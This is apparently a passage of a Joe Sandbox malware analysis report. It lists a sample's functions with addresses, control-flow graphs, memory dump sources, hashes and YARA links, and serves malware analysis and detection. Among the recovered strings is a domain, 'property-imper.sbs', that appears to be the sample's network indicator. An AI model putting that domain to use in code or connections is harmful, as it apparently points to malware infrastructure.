                                                                                • Associated: 00000000.00000002.1498033939.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498104620.0000000000C07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000E9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000EB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498460386.0000000000EB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498603632.0000000001052000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498625500.0000000001053000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bb0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: Uninitialize
                                                                                • String ID: Lk$U\$Zb$property-imper.sbs$r
                                                                                • API String ID: 3861434553-2211913898
                                                                                • Opcode ID: 5e0700d9ef70107ec67235be62a62cb2541f876c1818ec83c14256078de2ed9f
                                                                                • Instruction ID: 18f99dfca683781c9a107cceafc5fcb3837bc81bbe67241c59eb3a472f60a225
                                                                                • Opcode Fuzzy Hash: 5e0700d9ef70107ec67235be62a62cb2541f876c1818ec83c14256078de2ed9f
                                                                                • Instruction Fuzzy Hash: 7BA19B7010C3D18BD7758F25C4947EBBBE1ABA3304F188A9CD0EA4B296DB798506CB57
                                                                                Function 00BB89A0 Relevance: 1.8, APIs: 1, Instructions: 252COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 226 bb89a0-bb89b1 call becb70 229 bb8cb3-bb8cbb ExitProcess 226->229 230 bb89b7-bb89cf call be6620 226->230 234 bb8cae call bedeb0 230->234 235 bb89d5-bb89fb 230->235 234->229 239 bb89fd-bb89ff 235->239 240 bb8a01-bb8bda 235->240 239->240 242 bb8c8a-bb8ca2 call bb9ed0 240->242 243 bb8be0-bb8c50 240->243 242->234 248 bb8ca4 call bbce80 242->248 244 bb8c52-bb8c54 243->244 245 bb8c56-bb8c88 243->245 244->245 245->242 250 bb8ca9 call bbb930 248->250 250->234
                                                                                APIs
                                                                                • ExitProcess.KERNEL32(00000000), ref: 00BB8CB5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1498033939.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1498010414.0000000000BB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498033939.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498104620.0000000000C07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000E9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000EB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498460386.0000000000EB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498603632.0000000001052000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498625500.0000000001053000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bb0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID:
                                                                                • API String ID: 621844428-0
                                                                                • Opcode ID: 32d1af808abb8da98e4a568ba8c2e1baece9163497e03d660447e83d74f50fc3
                                                                                • Instruction ID: fc78aeb7a705191063ea43009a0fb2a0a1c6cc214f36fb9e7f4916df4f203357
                                                                                • Opcode Fuzzy Hash: 32d1af808abb8da98e4a568ba8c2e1baece9163497e03d660447e83d74f50fc3
                                                                                • Instruction Fuzzy Hash: 2A71E673B547040BC70CDEBAD89236AFAD6ABC8714F09D93D6988D7350EAB89C054685
                                                                                Function 00BC9530 Relevance: 1.7, Strings: 1, Instructions: 449COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 252 bc9530-bc9551 253 bc9560-bc9569 252->253 253->253 254 bc956b-bc9573 253->254 255 bc9580-bc9589 254->255 255->255 256 bc958b-bc9597 255->256 257 bc9599-bc959e 256->257 258 bc95a0-bc95a2 256->258 259 bc95a9-bc95bb call bb82b0 257->259 258->259 262 bc95bd-bc95c3 259->262 263 bc95e1-bc95f2 259->263 264 bc95d0-bc95df 262->264 265 bc95f4-bc95fa 263->265 266 bc9613 263->266 264->263 264->264 267 bc9600-bc960f 265->267 268 bc9616-bc9639 call bf0480 266->268 267->267 269 bc9611 267->269 272 bc9640-bc9652 268->272 269->268 272->272 273 bc9654-bc965b 272->273 274 bc989f-bc98a9 call bb82c0 273->274 275 bc98b8-bc98bd call bb82c0 273->275 276 bc96da-bc96ea call be9800 273->276 277 bc9794-bc979f 273->277 278 bc9715-bc971a 273->278 279 bc96d0 273->279 280 bc96f0-bc96fd call be9800 273->280 281 bc96d2 273->281 282 bc98b2 273->282 283 bc996c-bc997f call bb82c0 273->283 284 bc9729-bc9744 call bf0480 273->284 285 bc9769-bc977e call bb82b0 call bf0880 273->285 286 bc96ca 273->286 287 bc974b-bc9762 call bf07b0 273->287 288 bc9706-bc970e 273->288 289 bc98c7-bc98db 273->289 290 bc9980 273->290 291 bc9721 273->291 292 bc9662-bc9676 273->292 293 bc9982-bc998b 273->293 274->282 308 bc98c2-bc98c4 275->308 276->280 299 bc97a0-bc97a9 277->299 278->274 278->275 278->277 278->282 278->283 278->285 278->287 278->289 278->290 278->291 278->293 280->288 281->276 283->290 284->274 284->275 284->277 284->282 284->283 284->285 284->287 284->289 284->290 284->291 284->293 320 bc9783-bc978d 285->320 286->279 287->274 287->275 287->277 287->282 287->283 287->285 287->289 287->290 287->293 288->274 288->275 288->277 288->278 288->282 288->283 288->284 288->285 288->287 288->289 288->290 288->291 288->293 298 bc98e0-bc98f4 289->298 291->284 300 bc9680-bc96b4 292->300 298->298 310 bc98f6-bc98fe 298->310 299->299 311 bc97ab-bc97b5 299->311 300->300 312 bc96b6-bc96c3 300->312 308->289 317 bc9937 310->317 318 bc9900-bc9911 310->318 319 bc97c0-bc97c9 311->319 312->274 312->275 312->276 312->277 312->278 312->279 312->280 312->281 312->282 312->283 312->284 312->285 312->286 312->287 312->288 312->289 312->290 312->291 312->293 324 bc9940-bc9946 317->324 321 bc9920-bc9927 318->321 319->319 322 bc97cb-bc97e3 319->322 320->274 320->275 320->277 320->282 320->283 320->289 320->290 320->293 323 bc9929-bc992c 321->323 321->324 325 bc97ec-bc97ef 322->325 326 bc97e5-bc97ea 322->326 323->321 327 bc992e 323->327 329 bc9948 324->329 330 bc9951-bc9963 call bedf70 324->330 328 bc97f6-bc9807 call bb82b0 325->328 326->328 327->317 335 bc9809-bc980f 328->335 336 bc9821-bc9835 328->336 329->330 330->283 337 bc9810-bc981f 335->337 338 bc9837-bc983a 336->338 339 bc9851-bc985f 336->339 337->336 337->337 340 bc9840-bc984f 338->340 341 bc9881-bc9897 call bb8fd0 339->341 342 bc9861-bc9864 339->342 340->339 340->340 341->274 343 bc9870-bc987f 342->343 343->341 343->343
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1498033939.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1498010414.0000000000BB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498033939.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498104620.0000000000C07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000E9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000EB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498460386.0000000000EB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498603632.0000000001052000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498625500.0000000001053000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bb0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: efg`
                                                                                • API String ID: 0-115929991
                                                                                • Opcode ID: d88ea9583383c12e21214d60da3762e2de3d03647a161ed0020acfd4f0cf9b58
                                                                                • Instruction ID: 2664ca3aac39662df996e89e57204c7cea26018a988d3e4325d48f7678aed5a3
                                                                                • Opcode Fuzzy Hash: d88ea9583383c12e21214d60da3762e2de3d03647a161ed0020acfd4f0cf9b58
                                                                                • Instruction Fuzzy Hash: 69C103B1910215CBDB289F68DC92BBB73B4FF56310F1845ACE942A7391EB74A901C7A1
                                                                                Function 00BBE0D8 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1498033939.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1498010414.0000000000BB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498033939.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498104620.0000000000C07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000E9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000EB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498460386.0000000000EB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498603632.0000000001052000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498625500.0000000001053000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bb0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID: efg`
                                                                                • API String ID: 2994545307-115929991
                                                                                • Opcode ID: 41f19bf180e9397e2621a0f869a5da36c5367970992e3c8b23e4f09a4ad17042
                                                                                • Instruction ID: 6e6f4a5b37f46edb3d191da9b86fd3b1758b31d1cf50ca5cf0ddaf6af7eddd4a
                                                                                • Opcode Fuzzy Hash: 41f19bf180e9397e2621a0f869a5da36c5367970992e3c8b23e4f09a4ad17042
                                                                                • Instruction Fuzzy Hash: 1A5103B6A043505BD720EB609C927FF72D7AFD1304F1944A8E98967352DFB0AA02C693
                                                                                Function 00BF1580 Relevance: .3, Instructions: 293COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 496 bf1580-bf158f 497 bf15b3-bf15bc 496->497 498 bf1591 496->498 500 bf15be-bf15c1 497->500 501 bf15c3-bf15e4 497->501 499 bf15a0-bf15a8 498->499 499->499 502 bf15aa-bf15ad 499->502 500->501 503 bf15f0-bf1618 501->503 502->497 503->503 504 bf161a-bf1624 503->504 505 bf166f-bf167b 504->505 506 bf1626-bf162f 504->506 508 bf1680-bf169a 505->508 507 bf1630-bf1637 506->507 509 bf1639-bf163c 507->509 510 bf1640-bf1646 507->510 508->508 511 bf169c-bf169f 508->511 509->507 512 bf163e 509->512 510->505 513 bf1648-bf1665 call bedf70 510->513 514 bf189f-bf18a8 511->514 515 bf16a5-bf16cf call beb7e0 511->515 512->505 518 bf166a-bf166d 513->518 520 bf16d0-bf1754 515->520 518->505 520->520 521 bf175a-bf1776 520->521 522 bf1780-bf17a8 521->522 522->522 523 bf17aa-bf17b9 522->523 524 bf17bb-bf17c3 523->524 525 bf1813-bf1815 523->525 526 bf17d0-bf17d7 524->526 527 bf1817-bf181d 525->527 528 bf1893-bf189c call beb860 525->528 529 bf17d9-bf17dc 526->529 530 bf17e0-bf17e6 526->530 532 bf181f-bf1826 527->532 533 bf1828-bf182a 527->533 528->514 529->526 534 bf17de 529->534 530->525 536 bf17e8-bf1809 call bedf70 530->536 532->533 533->528 537 bf182c-bf1831 533->537 534->525 543 bf180e-bf1811 536->543 538 bf188a-bf1891 537->538 539 bf1833-bf183e 537->539 538->528 541 bf1842-bf187e 539->541 542 bf1840 539->542 541->538 544 bf1880-bf1887 541->544 542->541 543->525 544->538
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1498033939.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1498010414.0000000000BB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498033939.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498104620.0000000000C07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000E9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000EB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498460386.0000000000EB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498603632.0000000001052000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498625500.0000000001053000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bb0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: ae9461e70fb8af244f8b369f843bb8241012eae3e07a60abf5bb40a182d164d7
                                                                                • Instruction ID: b4ea4651398e4211ce838b7fc9e6c73780d684b6294e87f593c99b7fff353d4c
                                                                                • Opcode Fuzzy Hash: ae9461e70fb8af244f8b369f843bb8241012eae3e07a60abf5bb40a182d164d7
                                                                                • Instruction Fuzzy Hash: 4C81F1726083459FD714DE68D850A3BB7E2EB89310F088C7CEA95D7291E771DC49C782
                                                                                Function 00BF0C80 Relevance: .3, Instructions: 269COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 545 bf0c80-bf0ca7 546 bf0cb0-bf0cd8 545->546 546->546 547 bf0cda-bf0ce4 546->547 548 bf0d2e-bf0d46 547->548 549 bf0ce6-bf0cef 547->549 550 bf0d50-bf0d77 548->550 551 bf0cf0-bf0cf7 549->551 550->550 552 bf0d79-bf0d7c 550->552 553 bf0cf9-bf0cfc 551->553 554 bf0d00-bf0d06 551->554 555 bf0d82-bf0dab call beb7e0 552->555 556 bf0f50-bf0f59 552->556 553->551 557 bf0cfe 553->557 554->548 558 bf0d08-bf0d24 call bedf70 554->558 563 bf0db0-bf0dd9 555->563 557->548 561 bf0d29-bf0d2c 558->561 561->548 563->563 564 bf0ddb-bf0de6 563->564 565 bf0de8-bf0df6 564->565 566 bf0e50-bf0e52 564->566 569 bf0e00-bf0e08 565->569 567 bf0e58-bf0e5a 566->567 568 bf0f47-bf0f4d call beb860 566->568 567->568 570 bf0e60-bf0e62 567->570 568->556 572 bf0e0a-bf0e0d 569->572 573 bf0e13-bf0e1f 569->573 574 bf0f3f-bf0f44 570->574 575 bf0e68-bf0e72 570->575 572->569 577 bf0e0f-bf0e11 572->577 573->566 578 bf0e21-bf0e40 call bedf70 573->578 574->568 580 bf0e76-bf0e78 575->580 581 bf0e74 575->581 582 bf0e4c 577->582 583 bf0e45-bf0e4a 578->583 584 bf0e7e-bf0e8a 580->584 585 bf0f36-bf0f3b 580->585 581->580 582->566 583->582 586 bf0ecc-bf0ed1 584->586 587 bf0e8c-bf0e92 584->587 585->574 586->585 589 bf0ed3 586->589 588 bf0ea0-bf0eb7 587->588 588->588 591 bf0eb9-bf0ec8 588->591 590 bf0ee0-bf0f30 589->590 590->590 592 bf0f32 590->592 591->590 593 bf0eca 591->593 592->585 593->585
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1498033939.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1498010414.0000000000BB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498033939.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498104620.0000000000C07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000E9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000EB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498460386.0000000000EB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498603632.0000000001052000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498625500.0000000001053000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bb0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: a4c202cf34a8520a4d07bae43c6ecd94b949db6c81fee3c089fa3eeaae97c3fc
                                                                                • Instruction ID: 124c01e097f40fbb97c09b94c55972569bec31b72acb3cc463474269f0a636c2
                                                                                • Opcode Fuzzy Hash: a4c202cf34a8520a4d07bae43c6ecd94b949db6c81fee3c089fa3eeaae97c3fc
                                                                                • Instruction Fuzzy Hash: F47137355183499BC714AB28D850B3FB3E2FFD4710F15D9ACEA858B266DB309C55C782
                                                                                Function 00BEB8E0 Relevance: .2, Instructions: 217COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1498033939.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1498010414.0000000000BB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498033939.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498104620.0000000000C07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000E9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000EB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498460386.0000000000EB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498603632.0000000001052000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498625500.0000000001053000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bb0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 6dafdd8424afcdd590ff13687e35476551df217a75107c04fd007f6c8d010c42
                                                                                • Instruction ID: d3b7def40e4b9ed21bd9898793fd25cdeb69683583f6c575835a69d04ebe0d63
                                                                                • Opcode Fuzzy Hash: 6dafdd8424afcdd590ff13687e35476551df217a75107c04fd007f6c8d010c42
                                                                                • Instruction Fuzzy Hash: 66517936A083918BD7209F2A9840A3BB7E2EBD5720F29D6BCD9D527351DB31DC02C781

                                                                                Non-executed Functions

                                                                                Function 015640D3 Relevance: 2.7, Strings: 2, Instructions: 201COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1420326579.0000000001561000.00000004.00000020.00020000.00000000.sdmp, Offset: 01561000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_155f000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: I$M
                                                                                • API String ID: 0-2039460822
                                                                                • Opcode ID: 743f49929503bcd1b2dad5dfc31364cc9a4faf4d3ae9c6f89ed78d1ea676d02d
                                                                                • Instruction ID: 30f882a7e8f44c6f567714f97f6801f98a8a0e4fc513ea78af000421977190cd
                                                                                • Opcode Fuzzy Hash: 743f49929503bcd1b2dad5dfc31364cc9a4faf4d3ae9c6f89ed78d1ea676d02d
                                                                                • Instruction Fuzzy Hash: D481226254E7C15FD3438B749CA99923FB4AE23624B1E46DBC8C4CF0A3E218594EC763
                                                                                Function 01574C07 Relevance: 1.0, Instructions: 1008COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1441241710.0000000001573000.00000004.00000020.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                                                • Associated: 00000000.00000003.1420196601.000000000156D000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_156d000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d0e1af92450174d005f28d2102a287a7c4ee5600f90225c0486865ff989e4a51
                                                                                • Instruction ID: bbbb5a6b6798deb9ead863c5180a28a3657410d91f9827d270029d0f59aeeb69
                                                                                • Opcode Fuzzy Hash: d0e1af92450174d005f28d2102a287a7c4ee5600f90225c0486865ff989e4a51
                                                                                • Instruction Fuzzy Hash: 9612AD9551E7C16FD3238B359C69A9A7F75AF43224B1E82DFD0C08E4A3E3694809C763
                                                                                Function 01574C07 Relevance: .3, Instructions: 345COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1441241710.0000000001573000.00000004.00000020.00020000.00000000.sdmp, Offset: 01573000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_156d000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dce5bc3be5666205a105f627c8d90fa378f4296728951685d2ee53717982ac00
                                                                                • Instruction ID: 531e260af4d5552582174ce8869ae7aac93f8bbaed0b522d53243390249e6c13
                                                                                • Opcode Fuzzy Hash: dce5bc3be5666205a105f627c8d90fa378f4296728951685d2ee53717982ac00
                                                                                • Instruction Fuzzy Hash: 3CA1039181E7C12FD7138B359C5A6867FA1AF03314B5E83CFD4D08E4A3E369951AC762
                                                                                Function 01574CC9 Relevance: .3, Instructions: 264COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1441241710.0000000001573000.00000004.00000020.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                                                • Associated: 00000000.00000003.1420196601.000000000156D000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_156d000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f73c6de7a620ccd712194f4662e4a914dd6127a348a87352b220bc334f1b8e50
                                                                                • Instruction ID: 9aa818453a233c86bb7a420dcdb77d14bc186cc595543f0a61a8f790098c3de4
                                                                                • Opcode Fuzzy Hash: f73c6de7a620ccd712194f4662e4a914dd6127a348a87352b220bc334f1b8e50
                                                                                • Instruction Fuzzy Hash: 3B81F49551E7C16FD3238B349C6AA4A7F61BF13224B1E83CFD0D08E5A3E269450AC767